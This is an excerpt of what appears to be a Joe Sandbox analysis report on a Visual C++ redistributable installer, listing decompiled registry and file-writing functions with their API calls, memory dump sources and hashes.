                                                                          • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-3023217399
                                                                          • Opcode ID: 8afcfe8b236df276f884fcac9dcdab731aa2812911193bc42641e32e9e356e23
                                                                          • Instruction ID: 671497bb1baa9e530379a3546ba4c8849ec6017889541da2313df5b862cdc51a
                                                                          • Opcode Fuzzy Hash: 8afcfe8b236df276f884fcac9dcdab731aa2812911193bc42641e32e9e356e23
                                                                          • Instruction Fuzzy Hash: 6941C374E04219EFCB20DF94C885AEFB7F9EF49B06F214069E900AB211D7319E94CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050B49 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E00050B49(void* __ecx, void* _a4, short* _a8, signed short _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed short _t32;
				signed short _t33;
				void* _t38;
				signed short _t40;
				signed short _t48;
				void* _t49;
				signed short _t52;
				signed short _t55;
				signed short _t56;
				signed short _t57;
				signed short _t58;
				signed short _t60;
				signed short _t61;
				signed short _t62;

				_t49 = __ecx;
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t48 = 0;
				_t57 = _a12;
				if(_a16 == 0) {
					L8:
					_t60 = 0;
					__eflags =  *0x7b674 - _t48; // 0x0
					if(__eflags != 0) {
						L11:
						_t58 = _t57 - 1;
						__eflags = _t58;
						if(_t58 == 0) {
							_t48 = 0x200;
						} else {
							__eflags = _t58 == 1;
							if(_t58 == 1) {
								_t48 = 0x100;
							}
						}
						_t32 =  *0x7b66c; // 0x0
						__eflags = _t32;
						if(_t32 == 0) {
							_t33 = RegDeleteKeyW(_a4, _a8);
							_t56 = 0x80070002;
							__eflags = _t33;
							_t52 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
							__eflags = _t52 - 0x80070002;
							if(_t52 == 0x80070002) {
								goto L17;
							}
							__eflags = _t33;
							if(_t33 == 0) {
								goto L24;
							}
							_t61 = _t52;
							_t38 = 0x80004005;
							__eflags = _t61;
							_t60 =  >=  ? 0x80004005 : _t61;
							_push(_t60);
							_push(0xfb);
							goto L23;
						} else {
							_t40 =  *_t32(_a4, _a8, _t48, 0);
							_t56 = 0x80070002;
							__eflags = _t40;
							_t55 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							__eflags = _t55 - 0x80070002;
							if(_t55 != 0x80070002) {
								__eflags = _t40;
								if(_t40 == 0) {
									L24:
									if(_v8 != 0) {
										RegCloseKey(_v8);
										_v8 = _v8 & 0x00000000;
									}
									if(_v12 != 0) {
										E000554EF(_v12);
									}
									if(_v16 != 0) {
										E000554EF(_v16);
									}
									return _t60;
								}
								_t62 = _t55;
								_t38 = 0x80004005;
								__eflags = _t62;
								_t60 =  >=  ? 0x80004005 : _t62;
								_push(_t60);
								_push(0xf2);
								L23:
								_push("regutil.cpp");
								E000137D3(_t38);
								goto L24;
							}
							L17:
							_t60 = _t56;
							goto L24;
						}
					}
					__eflags = _t57;
					if(_t57 == 0) {
						goto L11;
					}
					_t60 = 0x80070057;
					goto L24;
				}
				_t60 = E00050E3F(_a4, _a8, 0x20019,  &_v8);
				if(_t60 != 0x80070002) {
					while(1) {
						__eflags = _t60;
						if(_t60 < 0) {
							goto L24;
						}
						_t60 = E00050D1C(_t49, _v8, 0,  &_v12);
						__eflags = _t60 - 0x80070103;
						if(_t60 != 0x80070103) {
							__eflags = _t60;
							if(_t60 < 0) {
								goto L24;
							}
							_t60 = E00012D79(_t49, _a8, _v12,  &_v16);
							__eflags = _t60;
							if(_t60 < 0) {
								goto L24;
							}
							_t60 = E00050B49(_t49, _a4, _v16, _t57, _a16);
							continue;
						}
						goto L8;
					}
					goto L24;
				}
				_t60 = 0;
				goto L24;
			}




















                                                                          0x00050b49
                                                                          0x00050b4f
                                                                          0x00050b53
                                                                          0x00050b57
                                                                          0x00050b5d
                                                                          0x00050b60
                                                                          0x00050b66
                                                                          0x00050bdf
                                                                          0x00050bdf
                                                                          0x00050be1
                                                                          0x00050be7
                                                                          0x00050bf7
                                                                          0x00050bf7
                                                                          0x00050bf7
                                                                          0x00050bfa
                                                                          0x00050c08
                                                                          0x00050bfc
                                                                          0x00050bfc
                                                                          0x00050bff
                                                                          0x00050c01
                                                                          0x00050c01
                                                                          0x00050bff
                                                                          0x00050c0d
                                                                          0x00050c12
                                                                          0x00050c14
                                                                          0x00050c5a
                                                                          0x00050c63
                                                                          0x00050c6e
                                                                          0x00050c70
                                                                          0x00050c73
                                                                          0x00050c75
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050c77
                                                                          0x00050c79
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050c7b
                                                                          0x00050c7d
                                                                          0x00050c82
                                                                          0x00050c84
                                                                          0x00050c87
                                                                          0x00050c88
                                                                          0x00000000
                                                                          0x00050c16
                                                                          0x00050c1f
                                                                          0x00050c24
                                                                          0x00050c2f
                                                                          0x00050c31
                                                                          0x00050c34
                                                                          0x00050c36
                                                                          0x00050c3c
                                                                          0x00050c3e
                                                                          0x00050c97
                                                                          0x00050c9b
                                                                          0x00050ca0
                                                                          0x00050ca6
                                                                          0x00050ca6
                                                                          0x00050cae
                                                                          0x00050cb3
                                                                          0x00050cb3
                                                                          0x00050cbc
                                                                          0x00050cc1
                                                                          0x00050cc1
                                                                          0x00050cce
                                                                          0x00050cce
                                                                          0x00050c40
                                                                          0x00050c42
                                                                          0x00050c47
                                                                          0x00050c49
                                                                          0x00050c4c
                                                                          0x00050c4d
                                                                          0x00050c8d
                                                                          0x00050c8d
                                                                          0x00050c92
                                                                          0x00000000
                                                                          0x00050c92
                                                                          0x00050c38
                                                                          0x00050c38
                                                                          0x00000000
                                                                          0x00050c38
                                                                          0x00050c14
                                                                          0x00050be9
                                                                          0x00050beb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050bed
                                                                          0x00000000
                                                                          0x00050bed
                                                                          0x00050b7c
                                                                          0x00050b84
                                                                          0x00050bbf
                                                                          0x00050bbf
                                                                          0x00050bc1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050bd5
                                                                          0x00050bd7
                                                                          0x00050bdd
                                                                          0x00050b8d
                                                                          0x00050b8f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050ba4
                                                                          0x00050ba6
                                                                          0x00050ba8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00050bbd
                                                                          0x00000000
                                                                          0x00050bbd
                                                                          0x00000000
                                                                          0x00050bdd
                                                                          0x00000000
                                                                          0x00050bbf
                                                                          0x00050b86
                                                                          0x00000000

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00050CA0
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 47109696-955085611
                                                                          • Opcode ID: f848cced0288d2b10bd4482bfd45fe21377c38d92720a6c8e918b7560e93c95a
                                                                          • Instruction ID: 786debc64343ddf289617ab1298808aa8ebaf1ca462daf742bcbca3b2d08d148
                                                                          • Opcode Fuzzy Hash: f848cced0288d2b10bd4482bfd45fe21377c38d92720a6c8e918b7560e93c95a
                                                                          • Instruction Fuzzy Hash: 0D41F432D01229FBEF215BA4CE45BAF7FE4AB04316F118269ED05AB160D3358D58DB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050F6E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E00050F6E(void* _a4, short* _a8, char** _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				void* _v20;
				signed int _t37;
				void* _t44;
				signed short _t60;
				char** _t64;
				void* _t65;
				void* _t66;

				_t64 = _a12;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_t64 == 0 ||  *_t64 == 0) {
					L4:
					_v8 = 2;
					_t65 = E00011EDE(_t64, 2);
					if(_t65 < 0) {
						goto L20;
					} else {
						_t37 = _v8;
						goto L6;
					}
				} else {
					_t65 = E0001275D( *_t64,  &_v8);
					if(_t65 < 0) {
						L20:
						if(_v20 != 0) {
							E000554EF(_v20);
						}
						return _t65;
					}
					_t37 = _v8;
					if(_t37 >= 2) {
						L6:
						_v16 = _t37 * 2 - 2;
						_t60 = RegQueryValueExW(_a4, _a8, 0,  &_v12,  *_t64,  &_v16);
						if(_t60 != 0xea) {
							L9:
							_t44 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
							if(_t44 != 0x80070002) {
								if(_t60 == 0) {
									if(_v12 == 1 || _v12 == 2) {
										( *_t64)[_v8 * 2 - 2] = 0;
										if(_v12 == 2) {
											_t65 = E000121A5( &_v20,  *_t64, 0);
											if(_t65 >= 0) {
												_t65 = E00013083(_t64, _v20, 1);
											}
										}
									} else {
										_t65 = 0x8007070c;
										_push(0x8007070c);
										_push(0x1ef);
										L13:
										_push("regutil.cpp");
										E000137D3(_t44);
									}
									goto L20;
								}
								_t66 = _t44;
								_t44 = 0x80004005;
								_t65 =  >=  ? 0x80004005 : _t66;
								_push(_t65);
								_push(0x1dc);
								goto L13;
							}
							_t65 = 0x80070002;
							goto L20;
						}
						_v8 = (_v16 >> 1) + 1;
						_t65 = E00011EDE(_t64, (_v16 >> 1) + 1);
						if(_t65 < 0) {
							goto L20;
						}
						_t60 = RegQueryValueExW(_a4, _a8, 0,  &_v12,  *_t64,  &_v16);
						goto L9;
					}
					goto L4;
				}
			}













                                                                          0x00050f79
                                                                          0x00050f7c
                                                                          0x00050f7f
                                                                          0x00050f82
                                                                          0x00050f85
                                                                          0x00050f8a
                                                                          0x00050fad
                                                                          0x00050fb0
                                                                          0x00050fbc
                                                                          0x00050fc0
                                                                          0x00000000
                                                                          0x00050fc6
                                                                          0x00050fc6
                                                                          0x00000000
                                                                          0x00050fc6
                                                                          0x00050f90
                                                                          0x00050f9b
                                                                          0x00050f9f
                                                                          0x000510ad
                                                                          0x000510b0
                                                                          0x000510b5
                                                                          0x000510b5
                                                                          0x000510c2
                                                                          0x000510c2
                                                                          0x00050fa5
                                                                          0x00050fab
                                                                          0x00050fc9
                                                                          0x00050fd0
                                                                          0x00050fea
                                                                          0x00050ff2
                                                                          0x00051027
                                                                          0x00051036
                                                                          0x0005103b
                                                                          0x00051043
                                                                          0x00051067
                                                                          0x00051083
                                                                          0x0005108c
                                                                          0x0005109a
                                                                          0x0005109e
                                                                          0x000510ab
                                                                          0x000510ab
                                                                          0x0005109e
                                                                          0x0005106f
                                                                          0x0005106f
                                                                          0x00051074
                                                                          0x00051075
                                                                          0x00051057
                                                                          0x00051057
                                                                          0x0005105c
                                                                          0x0005105c
                                                                          0x00000000
                                                                          0x00051067
                                                                          0x00051045
                                                                          0x00051047
                                                                          0x0005104e
                                                                          0x00051051
                                                                          0x00051052
                                                                          0x00000000
                                                                          0x00051052
                                                                          0x0005103d
                                                                          0x00000000
                                                                          0x0005103d
                                                                          0x00050ffc
                                                                          0x00051004
                                                                          0x00051008
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00051025
                                                                          0x00000000
                                                                          0x00051025
                                                                          0x00000000
                                                                          0x00050fab

                                                                          APIs
                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00050FE4
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0005101F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 3660427363-955085611
                                                                          • Opcode ID: 9a31ba54e1014d4bb7f8b8da50a3817e53ffb66bd57ce75ad751fd7eb20c02ec
                                                                          • Instruction ID: d4375f1ee823f9c8cfd0234e077116e15000a4ad7ead2f83081ee114c25880ad
                                                                          • Opcode Fuzzy Hash: 9a31ba54e1014d4bb7f8b8da50a3817e53ffb66bd57ce75ad751fd7eb20c02ec
                                                                          • Instruction Fuzzy Hash: A741AE35D0022AEFDF209E94C885AEFBBB9EF44311F104169ED14A7290D7719E95CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00058E07 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E00058E07(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* __ebx;
				void* _t60;
				void* _t61;

				_t57 = __ecx;
				_v24 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_t61 = E00058CFB(__ecx, _a8,  &_v24);
				if(_t61 >= 0) {
					_t61 = E00050E3F(_a4, _v24, 0x20019,  &_v16);
					if(_t61 >= 0) {
						_t61 = E00050E3F(_v16,  *0x7a7e4, 0x20019,  &_v12);
						if(_t61 == 0x80070002) {
							L12:
							_t61 = 0;
						} else {
							if(_t61 >= 0) {
								_t60 = 0;
								_push( &_v8);
								_push(0);
								while(1) {
									_push(_v12);
									_t61 = E00050D1C(_t57);
									if(_t61 == 0x80070103) {
										goto L12;
									}
									if(_t61 >= 0) {
										_t61 = E000554A3(_t57, _a16, _v8);
										if(_t61 != 0x80070490) {
											L9:
											if(_t61 >= 0) {
												_t60 = _t60 + 1;
												_push( &_v8);
												_push(_t60);
												continue;
											}
										} else {
											_t61 = E00058D7F(0, _t57, _a4, _v8,  &_v20);
											if(_t61 >= 0) {
												_t61 = E00058F31(_a20, _a24, _v8, _v20);
												goto L9;
											}
										}
									}
									goto L13;
								}
								goto L12;
							}
						}
					}
				}
				L13:
				if(_v20 != 0) {
					E000554EF(_v20);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
					_v12 = 0;
				}
				if(_v16 != 0) {
					RegCloseKey(_v16);
					_v16 = 0;
				}
				if(_v24 != 0) {
					E000554EF(_v24);
				}
				return _t61;
			}











                                                                          0x00058e07
                                                                          0x00058e19
                                                                          0x00058e1c
                                                                          0x00058e1f
                                                                          0x00058e22
                                                                          0x00058e25
                                                                          0x00058e2d
                                                                          0x00058e31
                                                                          0x00058e4c
                                                                          0x00058e50
                                                                          0x00058e69
                                                                          0x00058e71
                                                                          0x00058edd
                                                                          0x00058edd
                                                                          0x00058e73
                                                                          0x00058e75
                                                                          0x00058e7a
                                                                          0x00058e7c
                                                                          0x00058e7d
                                                                          0x00058ecb
                                                                          0x00058ecb
                                                                          0x00058ed3
                                                                          0x00058edb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058e82
                                                                          0x00058e8f
                                                                          0x00058e97
                                                                          0x00058ec1
                                                                          0x00058ec3
                                                                          0x00058ec8
                                                                          0x00058ec9
                                                                          0x00058eca
                                                                          0x00000000
                                                                          0x00058eca
                                                                          0x00058e99
                                                                          0x00058ea8
                                                                          0x00058eac
                                                                          0x00058ebf
                                                                          0x00000000
                                                                          0x00058ebf
                                                                          0x00058eac
                                                                          0x00058e97
                                                                          0x00000000
                                                                          0x00058e82
                                                                          0x00000000
                                                                          0x00058ecb
                                                                          0x00058e75
                                                                          0x00058e71
                                                                          0x00058e50
                                                                          0x00058edf
                                                                          0x00058ee2
                                                                          0x00058ee7
                                                                          0x00058ee7
                                                                          0x00058eef
                                                                          0x00058ef4
                                                                          0x00058ef4
                                                                          0x00058f02
                                                                          0x00058f07
                                                                          0x00058f09
                                                                          0x00058f09
                                                                          0x00058f0f
                                                                          0x00058f14
                                                                          0x00058f16
                                                                          0x00058f16
                                                                          0x00058f1c
                                                                          0x00058f21
                                                                          0x00058f21
                                                                          0x00058f2e

                                                                          APIs
                                                                            • Part of subcall function 00058CFB: lstrlenW.KERNEL32(00000100,?,?,00059098,000002C0,00000100,00000100,00000100,?,?,?,00037B40,?,?,000001BC,00000000), ref: 00058D1B
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0005B4F0,wininet.dll,?), ref: 00058F07
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0005B4F0,wininet.dll,?), ref: 00058F14
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                            • Part of subcall function 00050D1C: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00038BD8), ref: 00050D77
                                                                            • Part of subcall function 00050D1C: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00038BD8,00000000), ref: 00050D99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                          • String ID: wininet.dll
                                                                          • API String ID: 2680864210-3354682871
                                                                          • Opcode ID: 32ee1b3b55d2841c954d33ccad309453e68ef89da7c59b6319d85b53b2d42ec2
                                                                          • Instruction ID: dc4f037221cac7266d3fc1e4b7855cba7ae725a148345bf5721f19a89ec7c86b
                                                                          • Opcode Fuzzy Hash: 32ee1b3b55d2841c954d33ccad309453e68ef89da7c59b6319d85b53b2d42ec2
                                                                          • Instruction Fuzzy Hash: A6311876C0112DAFCF21AF94CC428EFBBBAEB44352B558169ED0176122DB315E58DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00059220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E00059220(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t55;
				void* _t58;

				_t55 = __edx;
				_t54 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_t58 = E00058CFB(__ecx, _a8,  &_v20);
				if(_t58 >= 0) {
					_t58 = E00050AD5(__ecx, _a4, _v20, 0x20006, 0, 0,  &_v12,  &_v24);
					if(_t58 >= 0) {
						_push(_a12);
						_t58 = E00011F20( &_v16, L"%ls\\%ls",  *0x7a7e4);
						if(_t58 >= 0) {
							_t58 = E00050AD5(_t54, _v12, _v16, 0x20006, 0, 0,  &_v8,  &_v24);
							if(_t58 >= 0) {
								_t58 = E00051392(_t54, _t55, _v8,  *0x7a7d4, _a16);
								if(_t58 >= 0) {
									_t58 = E00051392(_t54, _t55, _v8,  *0x7a7d8, _a20);
									if(_t58 >= 0 && _a24 != 0) {
										_t58 = E00051344(_v8,  *0x7a7dc, _a24);
									}
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					E000554EF(_v16);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
					_v12 = 0;
				}
				if(_v20 != 0) {
					E000554EF(_v20);
				}
				return _t58;
			}










                                                                          0x00059220
                                                                          0x00059220
                                                                          0x00059232
                                                                          0x00059235
                                                                          0x00059238
                                                                          0x0005923b
                                                                          0x0005923e
                                                                          0x00059246
                                                                          0x0005924a
                                                                          0x0005926b
                                                                          0x0005926f
                                                                          0x00059275
                                                                          0x0005928c
                                                                          0x00059293
                                                                          0x000592ab
                                                                          0x000592af
                                                                          0x000592c2
                                                                          0x000592c6
                                                                          0x000592d9
                                                                          0x000592dd
                                                                          0x000592f5
                                                                          0x000592f5
                                                                          0x000592dd
                                                                          0x000592c6
                                                                          0x000592af
                                                                          0x00059293
                                                                          0x0005926f
                                                                          0x00059300
                                                                          0x00059305
                                                                          0x00059307
                                                                          0x00059307
                                                                          0x0005930d
                                                                          0x00059312
                                                                          0x00059312
                                                                          0x0005931a
                                                                          0x0005931f
                                                                          0x00059321
                                                                          0x00059321
                                                                          0x00059327
                                                                          0x0005932c
                                                                          0x0005932c
                                                                          0x00059339

                                                                          APIs
                                                                            • Part of subcall function 00058CFB: lstrlenW.KERNEL32(00000100,?,?,00059098,000002C0,00000100,00000100,00000100,?,?,?,00037B40,?,?,000001BC,00000000), ref: 00058D1B
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000), ref: 00059305
                                                                          • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 0005931F
                                                                            • Part of subcall function 00050AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,00020491,?,00000000,00020006), ref: 00050AFA
                                                                            • Part of subcall function 00051392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,0A79F685,00000000,0A79F685,000000FF,00000000,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006), ref: 000513C5
                                                                            • Part of subcall function 00051392: RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006,0A79F685,00020006,00020006,00000000,?,?,?), ref: 000513F5
                                                                            • Part of subcall function 00051344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0001F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00051359
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Close$CreateDeletelstrlen
                                                                          • String ID: %ls\%ls
                                                                          • API String ID: 3924016894-2125769799
                                                                          • Opcode ID: 1edcd6e9082bb4c34b3f955374626497deb7d498ba9ca9dcc838c8876fc226f6
                                                                          • Instruction ID: c5a4cf2cff20749473fd73fc1fcba74b2c1936293765c7996a4a1b2d5961f0e1
                                                                          • Opcode Fuzzy Hash: 1edcd6e9082bb4c34b3f955374626497deb7d498ba9ca9dcc838c8876fc226f6
                                                                          • Instruction Fuzzy Hash: 3E31F772C0112EFBCF129F94CC818EFBBB9EF04352F05416AAE04B2121D7368E54AB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004CD32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E0004CD32(intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v10;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				intOrPtr _t35;
				long _t43;
				signed int _t44;
				signed short* _t47;
				void* _t48;
				void* _t52;
				signed int* _t57;
				long _t59;
				void* _t60;
				intOrPtr* _t62;
				void* _t63;
				signed int _t64;

				E00059F00();
				_t29 =  *0x7a008; // 0xfbf51acb
				_v8 = _t29 ^ _t64;
				_t49 = _a8;
				_t47 = _a12;
				_t62 = _a4;
				_t52 =  *( *((intOrPtr*)(0x7b158 + (_a8 >> 6) * 4)) + 0x18 + (_t49 & 0x0000003f) * 0x30);
				_t35 = _a16 + _t47;
				_v5140 = _t52;
				_v5132 = _t35;
				 *_t62 = 0;
				 *((intOrPtr*)(_t62 + 4)) = 0;
				 *((intOrPtr*)(_t62 + 8)) = 0;
				while(_t47 < _t35) {
					_t57 =  &_v5128;
					while(_t47 < _t35) {
						_t44 =  *_t47 & 0x0000ffff;
						_t47 =  &(_t47[1]);
						if(_t44 == 0xa) {
							 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t62 + 8)) + 2;
							_push(0xd);
							_pop(0);
							 *_t57 = 0;
							_t57 =  &(_t57[0]);
						}
						 *_t57 = _t44;
						_t57 =  &(_t57[0]);
						_t35 = _v5132;
						if(_t57 <  &_v10) {
							continue;
						}
						break;
					}
					_t59 = _t57 -  &_v5128 & 0xfffffffe;
					if(WriteFile(_t52,  &_v5128, _t59,  &_v5136, 0) == 0) {
						 *_t62 = GetLastError();
					} else {
						_t43 = _v5136;
						 *((intOrPtr*)(_t62 + 4)) =  *((intOrPtr*)(_t62 + 4)) + _t43;
						if(_t43 >= _t59) {
							_t35 = _v5132;
							_t52 = _v5140;
							continue;
						}
					}
					L12:
					_pop(_t60);
					_pop(_t63);
					_pop(_t48);
					return E0003DE36(_t48, _v8 ^ _t64, 0, _t60, _t63);
				}
				goto L12;
			}


























                                                                          0x0004cd3c
                                                                          0x0004cd41
                                                                          0x0004cd48
                                                                          0x0004cd4b
                                                                          0x0004cd5a
                                                                          0x0004cd65
                                                                          0x0004cd69
                                                                          0x0004cd70
                                                                          0x0004cd72
                                                                          0x0004cd7a
                                                                          0x0004cd80
                                                                          0x0004cd82
                                                                          0x0004cd85
                                                                          0x0004cdff
                                                                          0x0004cd8a
                                                                          0x0004cd90
                                                                          0x0004cd94
                                                                          0x0004cd97
                                                                          0x0004cd9d
                                                                          0x0004cd9f
                                                                          0x0004cda3
                                                                          0x0004cda5
                                                                          0x0004cda6
                                                                          0x0004cda9
                                                                          0x0004cda9
                                                                          0x0004cdac
                                                                          0x0004cdb2
                                                                          0x0004cdb7
                                                                          0x0004cdbd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004cdbd
                                                                          0x0004cdd0
                                                                          0x0004cde4
                                                                          0x0004ce0b
                                                                          0x0004cde6
                                                                          0x0004cde6
                                                                          0x0004cdec
                                                                          0x0004cdf1
                                                                          0x0004cdf3
                                                                          0x0004cdf9
                                                                          0x00000000
                                                                          0x0004cdf9
                                                                          0x0004cdf1
                                                                          0x0004ce0d
                                                                          0x0004ce12
                                                                          0x0004ce13
                                                                          0x0004ce16
                                                                          0x0004ce1f
                                                                          0x0004ce1f
                                                                          0x00000000

                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0004D16F,?,00000000,?,00000000,00000000), ref: 0004CDDC
                                                                          • GetLastError.KERNEL32(?,0004D16F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CE05
                                                                          Strings
